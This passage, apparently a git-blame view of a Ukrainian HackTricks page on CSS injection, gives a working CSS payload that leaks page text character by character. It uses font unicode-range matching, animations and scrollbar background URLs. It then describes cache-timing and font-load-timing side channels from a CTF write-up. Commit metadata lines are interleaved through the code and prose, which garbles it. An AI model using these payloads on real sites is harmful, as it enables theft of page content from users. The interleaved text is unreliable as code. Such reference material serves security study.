@font-face{font-family:has_6;src:local('Comic Sans MS');unicode-range:U+36;font-style:monospace;}
@font-face{font-family:has_7;src:local('Comic Sans MS');unicode-range:U+37;font-style:monospace;}
@font-face{font-family:has_8;src:local('Comic Sans MS');unicode-range:U+38;font-style:monospace;}
@font-face{font-family:has_9;src:local('Comic Sans MS');unicode-range:U+39;font-style:monospace;}
@font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF}
div.leak {
Translated to Ukranian
2024-03-29 18:49:46 +00:00
overflow-y: auto; /* leak channel */
overflow-x: hidden; /* remove false positives */
height: 40px; /* comic sans capitals exceed this height */
font-size: 0px; /* make suffix invisible */
letter-spacing: 0px; /* separation */
word-break: break-all; /* small width split words in lines */
font-family: rest; /* default */
background: grey; /* default */
width: 0px; /* initial value */
animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
div.leak::first-line{
Translated to Ukranian
2024-03-29 18:49:46 +00:00
font-size: 30px; /* prefix is visible in first line */
text-transform: uppercase; /* only capital letters leak */
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
/* iterate over all chars */
@keyframes trychar {
Translated to Ukranian
2024-03-29 18:49:46 +00:00
0% { font-family: rest; } /* delay for width change */
5% { font-family: has_A, rest; --leak: url(?a); }
6% { font-family: rest; }
10% { font-family: has_B, rest; --leak: url(?b); }
11% { font-family: rest; }
15% { font-family: has_C, rest; --leak: url(?c); }
16% { font-family: rest }
20% { font-family: has_D, rest; --leak: url(?d); }
21% { font-family: rest; }
25% { font-family: has_E, rest; --leak: url(?e); }
26% { font-family: rest; }
30% { font-family: has_F, rest; --leak: url(?f); }
31% { font-family: rest; }
35% { font-family: has_G, rest; --leak: url(?g); }
36% { font-family: rest; }
40% { font-family: has_H, rest; --leak: url(?h); }
41% { font-family: rest }
45% { font-family: has_I, rest; --leak: url(?i); }
46% { font-family: rest; }
50% { font-family: has_J, rest; --leak: url(?j); }
51% { font-family: rest; }
55% { font-family: has_K, rest; --leak: url(?k); }
56% { font-family: rest; }
60% { font-family: has_L, rest; --leak: url(?l); }
61% { font-family: rest; }
65% { font-family: has_M, rest; --leak: url(?m); }
66% { font-family: rest; }
70% { font-family: has_N, rest; --leak: url(?n); }
71% { font-family: rest; }
75% { font-family: has_O, rest; --leak: url(?o); }
76% { font-family: rest; }
80% { font-family: has_P, rest; --leak: url(?p); }
81% { font-family: rest; }
85% { font-family: has_Q, rest; --leak: url(?q); }
86% { font-family: rest; }
90% { font-family: has_R, rest; --leak: url(?r); }
91% { font-family: rest; }
95% { font-family: has_S, rest; --leak: url(?s); }
96% { font-family: rest; }
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
/* increase width char by char, i.e. add new char to prefix */
@keyframes loop {
Translated to Ukranian
2024-03-29 18:49:46 +00:00
0% { width: 0px }
1% { width: 20px }
2% { width: 40px }
3% { width: 60px }
4% { width: 80px }
4% { width: 100px }
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
5% { width: 120px }
6% { width: 140px }
7% { width: 0px }
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
div::-webkit-scrollbar {
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
background: blue;
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
/* side-channel */
div::-webkit-scrollbar:vertical {
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
background: blue var(--leak);
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
### Text node exfiltration (III): витік кодування з використанням шрифту за замовчуванням шляхом приховування елементів (не вимагає зовнішніх ресурсів) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
**Reference:** Це згадується як [невдале рішення в цьому звіті](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Цей випадок дуже схожий на попередній, однак у цьому випадку мета зробити конкретні **символи більшими за інші, щоб приховати щось** на кшталт кнопки, щоб її не натиснув бот, або зображення, яке не буде завантажено. Таким чином, ми могли б виміряти дію (або відсутність дії) і дізнатися, чи присутній конкретний символ у тексті.
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
### Text node exfiltration (III): витік кодування за допомогою таймінгу кешу (не вимагає зовнішніх ресурсів) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
**Reference:** Це згадується як [невдале рішення в цьому звіті](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
У цьому випадку ми могли б спробувати витікати, чи є символ у тексті, завантажуючи фейковий шрифт з того ж походження:
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
```css
@font-face {
Translated to Ukranian
2024-03-29 18:49:46 +00:00
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1);
unicode-range: U+0041;
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
}
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Якщо є збіг, **шрифт буде завантажено з `/static/bootstrap.min.css?q=1`**. Хоча він не завантажиться успішно, **браузер повинен його кешувати**, і навіть якщо кешу немає, існує механізм **304 not modified**, тому **відповідь повинна бути швидшою** за інші.
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Однак, якщо різниця в часі між кешованою відповіддю та некешованою не є достатньо великою, це не буде корисно. Наприклад, автор зазначив: Однак, після тестування, я виявив, що перша проблема полягає в тому, що швидкість не дуже відрізняється, а друга проблема в тому, що бот використовує прапор `disk-cache-size=1`, що дійсно продумано.
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
### Витік текстового вузла (III): витік кодування символів шляхом вимірювання часу завантаження сотень локальних "шрифтів" (не вимагаючи зовнішніх ресурсів) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
**Посилання:** Це згадується як [невдале рішення в цьому звіті](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
У цьому випадку ви можете вказати **CSS для завантаження сотень фальшивих шрифтів** з того ж походження, коли відбувається збіг. Таким чином, ви можете **виміряти час**, який це займає, і дізнатися, чи з'являється символ, чи ні, за допомогою чогось на кшталт:
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
```css
@font-face {
Translated to Ukranian
2024-03-29 18:49:46 +00:00
font-family: "A1";
src: url(/static/bootstrap.min.css?q=1),
url(/static/bootstrap.min.css?q=2),
....
url(/static/bootstrap.min.css?q=500);
unicode-range: U+0041;
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
}
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
А код бота виглядає так:
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
```python
browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Отже, якщо шрифт не збігається, час відповіді при відвідуванні бота очікується приблизно 30 секунд. Однак, якщо є збіг шрифтів, буде надіслано кілька запитів для отримання шрифту, що призведе до постійної активності в мережі. Як наслідок, знадобиться більше часу для задоволення умови зупинки та отримання відповіді. Тому час відповіді можна використовувати як індикатор для визначення, чи є збіг шрифтів.
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
## References
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
* [https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e](https://gist.github.com/jorgectf/993d02bdadb5313f48cf1dc92a7af87e)
* [https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b](https://d0nut.medium.com/better-exfiltration-via-html-injection-31c72a2dae8b)
* [https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d](https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d)
* [https://x-c3ll.github.io/posts/CSS-Injection-Primitives/](https://x-c3ll.github.io/posts/CSS-Injection-Primitives/)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
**Try Hard Security Group**
a
2024-03-14 23:01:13 +00:00
a
2024-03-26 14:56:40 +00:00
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
a
2024-03-14 23:01:13 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
<summary>Support HackTricks</summary>
arte
2024-01-01 17:15:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
{% endhint %}
Reference in a new issue Copy permalink